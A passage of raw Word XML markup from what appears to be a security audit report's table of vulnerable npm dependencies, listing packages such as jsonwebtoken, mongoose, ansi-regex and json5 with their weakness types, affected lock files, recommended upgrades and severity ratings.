              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0.4.0 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2440" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="109"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>jsonwebtoken@8. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="109"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Broken</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cryptographic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Algorithm,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Improper Authentication and Input Validation Issues</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="16"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="17"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="37"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"jsonwebtoken"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="31"/>
              <w:ind w:left="693"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>8.5.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="33"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>jsonwebtoken</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>9.0.0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2720" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="104"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId117">
              <w:r>
                <w:rPr>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="22"/>
                </w:rPr>
                <w:t>mongoose@6.1.8</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="104"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Prototype</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Pollution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
              <w:ind w:right="3405"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json app-backend/package-lock.json </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="210" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"mongoose"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="32"/>
              <w:ind w:left="693"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>6.1.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="33"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>mongoose</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>6.8.4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="37"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2140" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="110"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId118">
              <w:r>
                <w:rPr>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="22"/>
                </w:rPr>
                <w:t>ansi-regex@4.1.0</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="110"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ReDoS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="16"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="17"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
              <w:ind w:left="693" w:right="1498" w:hanging="594"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"node_modules/qrcode/node_modules/ansi-regex"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-25"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>4.1.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ansi-regex</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>6.0.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2200" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="115"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId119">
              <w:r>
                <w:rPr>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="22"/>
                </w:rPr>
                <w:t>json5@1.0.1</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="115"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Prototype</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
